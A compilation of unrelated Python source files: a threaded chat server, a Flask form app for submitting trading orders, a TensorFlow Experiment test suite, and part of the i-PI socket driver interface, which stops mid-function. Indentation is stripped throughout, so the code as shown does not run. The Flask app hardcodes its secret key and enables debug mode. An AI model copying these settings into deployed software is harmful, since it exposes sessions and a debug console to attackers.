# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
port = sys.argv[1] if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
chat_Server.py
|
import socket
from threading import Thread
import sys
sock = socket.socket()
sock.bind(("localhost", 24003))
sock.listen(10)
arr = []
def recieve():
while True:
for connection in arr:
try:
data = connection.recv(1024)
if data:
print(connection, ':', data.decode())
except socket.error as e:
if e.errno == 10053:
print("Users amount - ", len(arr))
else:
raise
def send():
while True:
global arr
message = input()
if message:
for connection in arr:
connection.send(message.encode())
def accept():
while True:
global arr
arr.append(sock.accept()[0])
print("Users amount - ", len(arr))
recieving = Thread(target=recieve)
sending = Thread(target=send)
accepting = Thread(target=accept)
recieving.start()
sending.start()
accepting.start()
|
web_application.py
|
from flask import Flask, render_template, request, url_for, redirect
from flask_bootstrap import Bootstrap
from forms import Enter_Order, Replace_Order, Cancel_Order, Submit_Order
import threading
import time
import json
from src.client import Client
app = Flask(__name__)
app.secret_key = "adkljrhLKJFHELJKFh"
bootstrap = Bootstrap(app)
order_number_index = 1
normalisedList = []
@app.route("/", methods = ["GET", "POST"])
def home():
form = Submit_Order()
if form.validate_on_submit():
send()
return render_template("completed.html")
return render_template('dashboard.html', form=form)
def send():
outbound = {
'actions': normalisedList
}
with open('test_inputs/client_100.json', 'w') as fp:
json.dump(outbound, fp)
Client(path='test_inputs/client_100.json')
def normalise_enter(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'order_token': int(form_info['order_token']),
'client_reference': str(form_info['client_reference']),
'buy_sell_indicator': str(form_info['indicator']),
'quantity': int(form_info['quantity']),
'orderbook_id': int(form_info['orderbook_id']),
'group': str(form_info['group']),
'price': float(form_info['price']),
'time_in_force': int(form_info['time_in_force']),
'firm_id': int(form_info['firm_id']),
'display': str(form_info['display']),
'capacity': str(form_info['capacity']),
'minimum_quantity': int(form_info['minimum_quantity']),
'order_classification': str(form_info['order_classification']),
'cash_margin_type': str(form_info['cash_margin_type'])
}
normalisedList.append(normalised)
def normalised_replace(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'existing_order_token': int(form_info['existing_order_token']),
'replacement_order_token': int(form_info['replacement_order_token']),
'quantity': int(form_info['quantity']),
'price': float(form_info['price']),
'time_in_force': int(form_info['time_in_force']),
'display': str(form_info['display']),
'minimum_quantity': int(form_info['minimum_quantity']),
}
normalisedList.append(normalised)
def normalised_cancel(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'order_token': int(form_info['order_token']),
'quantity': int(form_info['quantity']),
}
normalisedList.append(normalised)
@app.route('/enter_order', methods = ['GET', 'POST'])
def enter_order_page():
global order_number_index
form = Enter_Order()
if form.validate_on_submit():
order_number_index += 1
form_info = request.form
normalise_enter(form_info)
return redirect(url_for('enter_order_page'))
return render_template('enter.html', form = form, num = order_number_index)
@app.route('/replace_order', methods = ['GET', 'POST'])
def replace_order_page():
global order_number_index
form = Replace_Order()
if form.validate_on_submit():
order_number_index += 1
form_info = request.form
normalised_replace(form_info)
return redirect(url_for('replace_order_page'))
return render_template('replace.html', form = form, num = order_number_index)
@app.route('/cancel_order', methods = ['GET', 'POST'])
def cancel_order_page():
global order_number_index
form = Cancel_Order()
if form.validate_on_submit():
order_number_index +=1
form_info = request.form
normalised_cancel(form_info)
return redirect(url_for('cancel_order_page'))
return render_template('cancel.html', form = form, num = order_number_index)
@app.route('/dashboard', methods= ['GET', 'POST'])
def dashboard():
print("hello")
return render_template('dashboard.html')
if __name__ == '__main__':
# a = threading.Thread(target = app.run, daemon=True)
# b = threading.Thread(target = testing, daemon=True)
# a.start()
# b.start()
app.run(debug=True)
print("Press enter to exit.")
|
experiment_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(0, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(6, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(3, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_monitors_returns_shallow_copy(self):
noop_hook = _NoopHook()
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_monitors=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
self.assertAllEqual([noop_hook], ex.train_hooks)
another_noop_hook = _NoopHook()
# Assert that the property getter returns a shallow copy.
ex.train_hooks.extend([another_noop_hook])
self.assertAllEqual([noop_hook], ex.train_hooks)
# Assert that the extend API mutates the monitors.
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex.train_hooks)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
|
sockets.py
|
"""Deals with the socket communication between the PIMD and driver code.
Copyright (C) 2013, Joshua More and Michele Ceriotti
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http.//www.gnu.org/licenses/>.
Deals with creating the socket, transmitting and receiving data, accepting and
removing different driver routines and the parallelization of the force
calculation.
Classes:
Status: Simple class to keep track of the status, uses bitwise or to give
combinations of different status options.
DriverSocket: Class to deal with communication between a client and
the driver code.
InterfaceSocket: Host server class. Deals with distribution of all the jobs
between the different client servers.
Functions:
Message: Sends a header string through the socket.
Exceptions:
Disconnected: Raised if client has been disconnected.
InvalidStatus: Raised if client has the wrong status. Shouldn't have to be
used if the structure of the program is correct.
"""
__all__ = ['InterfaceSocket']
import numpy as np
import sys, os
import socket, select, threading, signal, string, time
from ipi.utils.depend import depstrip
from ipi.utils.messages import verbosity, warning, info
from ipi.utils.softexit import softexit
HDRLEN = 12
UPDATEFREQ = 10
TIMEOUT = 5.0
SERVERTIMEOUT = 2.0*TIMEOUT
NTIMEOUT = 10
def Message(mystr):
"""Returns a header of standard length HDRLEN."""
return string.ljust(string.upper(mystr), HDRLEN)
class Disconnected(Exception):
"""Disconnected: Raised if client has been disconnected."""
pass
class InvalidSize(Exception):
"""Disconnected: Raised if client returns forces with inconsistent number of atoms."""
pass
class InvalidStatus(Exception):
"""InvalidStatus: Raised if client has the wrong status.
Shouldn't have to be used if the structure of the program is correct.
"""
pass
class Status:
"""Simple class used to keep track of the status of the client.
Uses bitwise or to give combinations of different status options.
i.e. Status.Up | Status.Ready would be understood to mean that the client
was connected and ready to receive the position and cell data.
Attributes:
Disconnected: Flag for if the client has disconnected.
Up: Flag for if the client is running.
Ready: Flag for if the client has ready to receive position and cell data.
NeedsInit: Flag for if the client is ready to receive forcefield
parameters.
HasData: Flag for if the client is ready to send force data.
Busy: Flag for if the client is busy.
Timeout: Flag for if the connection has timed out.
"""
Disconnected = 0
Up = 1
Ready = 2
NeedsInit = 4
HasData = 8
Busy = 16
Timeout = 32
class DriverSocket(socket.socket):
"""Deals with communication between the client and driver code.
Deals with sending and receiving the data from the driver code. Keeps track
of the status of the driver. Initialises the driver forcefield, sends the
position and cell data, and receives the force data.
Attributes:
_buf: A string buffer to hold the reply from the driver.
status: Keeps track of the status of the driver.
lastreq: The ID of the last request processed by the client.
locked: Flag to mark if the client has been working consistently on one image.
"""
def __init__(self, socket):
"""Initialises DriverSocket.
Args:
socket: A socket through which the communication should be done.
"""
super(DriverSocket,self).__init__(_sock=socket)
self._buf = np.zeros(0,np.byte)
self.peername = self.getpeername()
self.status = Status.Up
self.waitstatus = False
self.lastreq = None
self.locked = False
def shutdown(self, how=socket.SHUT_RDWR):
self.sendall(Message("exit"))
self.status = Status.Disconnected
super(DriverSocket,self).shutdown(how)
def poll(self):
"""Waits for driver status."""
self.status = Status.Disconnected # sets disconnected as failsafe status, in case _getstatus fails and exceptions are ignored upstream
self.status = self._getstatus()
def _getstatus(self):
"""Gets driver status.
Returns:
An integer labelling the status via bitwise or of the relevant members
of Status.
"""
if not self.waitstatus:
try:
readable, writable, errored = select.select([], [self], [])
if self in writable:
self.sendall(Message("status"))
self.waitstatus = True
except:
return Status.Disconnected
try:
reply = self.recv(HDRLEN)
self.waitstatus = False # got status reply
except socket.timeout:
warning(" @SOCKET: Timeout in status recv!", verbosity.debug )
return Status.Up | Status.Busy | Status.Timeout
except:
return Status.Disconnected
if not len(reply) == HDRLEN:
return Status.Disconnected
elif reply == Message("ready"):
return Status.Up | Status.Ready
elif reply == Message("needinit"):
return Status.Up | Status.NeedsInit
elif reply == Message("havedata"):
return Status.Up | Status.HasData
else:
warning(" @SOCKET: Unrecognized reply: " + str(reply), verbosity.low )
return Status.Up
def recvall(self, dest):
"""Gets the potential energy, force and virial from the driver.
Args:
dest: Object to be read into.
Raises:
Disconnected: Raised if client is disconnected.
Returns:
The data read from the socket to be read into dest.
"""
blen = dest.itemsize*dest.size
if (blen > len(self._buf)):
self._buf.resize(blen)
bpos = 0
ntimeout = 0
while bpos < blen:
timeout = False
# pre-2.5 version.
try:
bpart = ""
bpart = self.recv(blen - bpos)
if len(bpart) == 0: raise socket.timeout # There is a problem if this returns no data
self._buf[bpos:bpos + len(bpart)] = np.fromstring(bpart, np.byte)
except socket.timeout:
warning(" @SOCKET: Timeout in status recvall, trying again!", verbosity.low)
timeout = True
ntimeout += 1
if ntimeout > NTIMEOUT:
warning(" @SOCKET: Couldn't receive within %5d attempts. Time to give up!" % (NTIMEOUT), verbosity.low)
raise Disconnected()
pass
if (not timeout and bpart == 0):
raise Disconnected()
bpos += len(bpart)
# post-2.5 version: slightly more compact for modern python versions
# try:
# bpart = 1
# bpart = self.recv_into(self._buf[bpos:], blen-bpos)
# except socket.timeout:
# print " @SOCKET: Timeout in status recvall, trying again!"
# timeout = True
# pass
# if (not timeout and bpart == 0):
# raise Disconnected()
# bpos += bpart
#TODO this Disconnected() exception currently just causes the program to hang.
#This should do something more graceful
if np.isscalar(dest):
return np.fromstring(self._buf[0:blen], dest.dtype)[0]
else:
return np.fromstring(self._buf[0:blen], dest.dtype).reshape(dest.shape)
def initialize(self, rid, pars):
"""Sends the initialization string to the driver.
Args:
rid: The index of the request, i.e. the replica that
the force calculation is for.
pars: The parameter string to be sent to the driver.
Raises:
InvalidStatus: Raised if the status is not NeedsInit.
"""
if self.status & Status.NeedsInit:
try:
self.sendall(Message("init"))
self.sendall(np.int32(rid))
self.sendall(np.int32(len(pars)))
self.sendall(pars)
except:
self.poll()
return
else:
raise InvalidStatus("Status in init was " + self.status)
def sendpos(self, pos, cell):
"""Sends the position and cell data to the driver.
Args:
pos: An array containing the atom positions.
cell: A cell object giving the system box.
Raises:
InvalidStatus: Raised if the status is not Ready.
"""
if (self.status & Status.Ready):
try:
self.sendall(Message("posdata"))
self.sendall(cell.h, 9*8)
self.sendall(cell.ih, 9*8)
self.sendall(np.int32(len(pos)/3))
self.sendall(pos, len(pos)*8)
except:
self.poll()
return
else:
raise InvalidStatus("Status in sendpos was " + self.status)
def getforce(self):
"""Gets the potential energy, force and virial from the driver.
Raises:
InvalidStatus: Raised if the status is not HasData.
Disconnected: Raised if the driver has disconnected.
Returns:
A list of the form [potential, force, virial, extra].
"""
if (self.status & Status.HasData):
self.sendall(Message("getforce"));
reply = ""
while True:
try:
reply = self.recv(HDRLEN)
except socket.timeout:
warning(" @SOCKET: Timeout in getforce, trying again!", verbosity.low)
continue
if reply == Message("forceready"):
break
else:
warning(" @SOCKET: Unexpected getforce reply: %s" % (reply), verbosity.low)
if reply == "":
raise Disconnected()
else:
raise InvalidStatus("Status in getforce was " + self.status)
mu = np.float64()
mu = self.recvall(mu)
mlen = np.int32()
mlen = self.recvall(mlen)
mf = np.zeros(3*mlen,np.float64)
mf = self.recvall(mf)
mvir = np.zeros((3,3),np.float64)
mvir = self.recvall(mvir)
#! Machinery to return a string as an "extra" field. Comment if you are using a old patched driver that does not return anything!
mlen = np.int32()
mlen = self.recvall(mlen)
if mlen > 0 :
mxtra = np.zeros(mlen,np.character)
mxtra = self.recvall(mxtra)
mxtra = "".join(mxtra)
else:
mxtra = ""
#!TODO must set up a machinery to intercept the "extra" return field
return [mu, mf, mvir, mxtra]
class InterfaceSocket(object):
"""Host server class.
Deals with distribution of all the jobs between the different client servers
and both initially and as clients either finish or are disconnected.
Deals with cleaning up after all calculations are done. Also deals with the
threading mechanism, and cleaning up if the interface is killed.
Attributes:
address: A string giving the name of the host network.
port: An integer giving the port the socket will be using.
slots: An integer giving the maximum allowed backlog of queued clients.
mode: A string giving the type of socket used.
latency: A float giving the number of seconds the interface will wait
before updating the client list.
timeout: A float giving a timeout limit for considering a calculation dead
and dropping the connection.
dopbc: A boolean which decides whether or not to fold the bead positions
back into the unit cell before passing them to the client code.
server: The socket used for data transmition.
clients: A list of the driver clients connected to the server.
requests: A list of all the jobs required in the current PIMD step.
jobs: A list of all the jobs currently running.
_poll_thread: The thread the poll loop is running on.
_prev_kill: Holds the signals to be sent to clean up the main thread
when a kill signal is sent.
_poll_true: A boolean giving whether the thread is alive.
_poll_iter: An integer used to decide whether or not to check for
client connections. It is used as a counter, once it becomes higher
than the pre-defined number of steps between checks the socket will
update the list of clients and then be reset to zero.
"""
def __init__(self, address="localhost", port=31415, slots=4, mode="unix", latency=1e-3, timeout=1.0, dopbc=True):
"""Initialises interface.
Args:
address: An optional string giving the name of the host server.
Defaults to 'localhost'.
port: An optional integer giving the port number. Defaults to 31415.
slots: An optional integer giving the maximum allowed backlog of
queueing clients. Defaults to 4.
mode: An optional string giving the type of socket. Defaults to 'unix'.
latency: An optional float giving the time in seconds the socket will
wait before updating the client list. Defaults to 1e-3.
timeout: Length of time waiting for data from a client before we assume
the connection is dead and disconnect the client.
dopbc: A boolean which decides whether or not to fold the bead positions
back into the unit cell before passing them to the client code.
Raises:
NameError: Raised if mode is not 'unix' or 'inet'.
"""
self.address = address
self.port = port
self.slots = slots
self.mode = mode
self.latency = latency
self.timeout = timeout
self.dopbc = dopbc
self._poll_thread = None
self._prev_kill = {}
self._poll_true = False
self._poll_iter = 0
def open(self):
"""Creates a new socket.
Used so that we can create a interface object without having to also
create the associated socket object.
"""
if self.mode == "unix":
self.server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
self.server.bind("/tmp/ipi_" + self.address)
info("Created unix socket with address " + self.address, verbosity.medium)
except:
raise ValueError("Error opening unix socket. Check if a file " + ("/tmp/ipi_" + self.address) + " exists, and remove it if unused.")
elif self.mode == "inet":
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.address,self.port))
info("Created inet socket with address " + self.address + " and port number " + str(self.port), verbosity.medium)
else:
raise NameError("InterfaceSocket mode " + self.mode + " is not implemented (should be unix/inet)")
self.server.listen(self.slots)
self.server.settimeout(SERVERTIMEOUT)
self.clients = []
self.requests = []
self.jobs = []
def close(self):
"""Closes down the socket."""
info(" @SOCKET: Shutting down the driver interface.", verbosity.low )
for c in self.clients[:]:
if (c.status & Status.Up):
c.shutdown(socket.SHUT_RDWR)
self.server.shutdown(socket.SHUT_RDWR)
self.server.close()
if self.mode == "unix":
os.unlink("/tmp/ipi_" + self.address)
def queue(self, atoms, cell, pars=None, reqid=0):
"""Adds a request.
Note that the pars dictionary need to be sent as a string of a
standard format so that the initialization of the driver can be done.
Args:
atoms: An Atoms object giving the atom positions.
cell: A Cell object giving the system box.
pars: An optional dictionary giving the parameters to be sent to the
driver for initialization. Defaults to {}.
reqid: An optional integer that identifies requests of the same type,
e.g. the bead index
Returns:
A list giving the status of the request of the form {'atoms': Atoms
object giving the atom positions, 'cell': Cell object giving the
system box, 'pars': parameter string, 'result': holds the result as a
list once the computation is done, 'status': a string labelling the
status, 'id': the id of the request, usually the bead number, 'start':
the starting time for the calculation, used to check for timeouts.}.
"""
par_str = " "
if not pars is None:
for k,v in pars.items():
par_str += k + " : " + str(v) + " , "
else:
par_str = " "
# APPLY PBC -- this is useful for codes such as LAMMPS that don't do full PBC when computing distances
pbcpos = depstrip(atoms.q).copy()
if self.dopbc:
cell.array_pbc(pbcpos)
newreq = {"pos": pbcpos, "cell": cell, "pars": par_str,
"result": None, "status": "Queued", "id": reqid,
"start": -1 }
self.requests.append(newreq)
return newreq
def release(self, request):
"""Empties the list of requests once finished.
Args:
request: A list of requests that are done.
"""
if request in self.requests:
self.requests.remove(request)
def pool_update(self):
"""Deals with keeping the pool of client drivers up-to-date during a
force calculation step.
Deals with maintaining the client list. Clients that have
disconnected are removed and their jobs removed from the list of
running jobs and new clients are connected to the server.
"""
for c in self.clients[:]:
if not (c.status & Status.Up):
try:
warning(" @SOCKET: Client " + str(c.peername) +" died or got unresponsive(C). Removing from the list.", verbosity.low)
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
c.status = Status.Disconnected
self.clients.remove(c)
for [k,j] in self.jobs[:]:
if j is c:
self.jobs = [ w for w in self.jobs if not ( w[0] is k and w[1] is j ) ] # removes pair in a robust way
#self.jobs.remove([k,j])
k["status"] = "Queued"
k["start"] = -1
keepsearch = True
while keepsearch:
readable, writable, errored = select.select([self.server], [], [], 0.0)
if self.server in readable:
client, address = self.server.accept()
client.settimeout(TIMEOUT)
driver = DriverSocket(client)
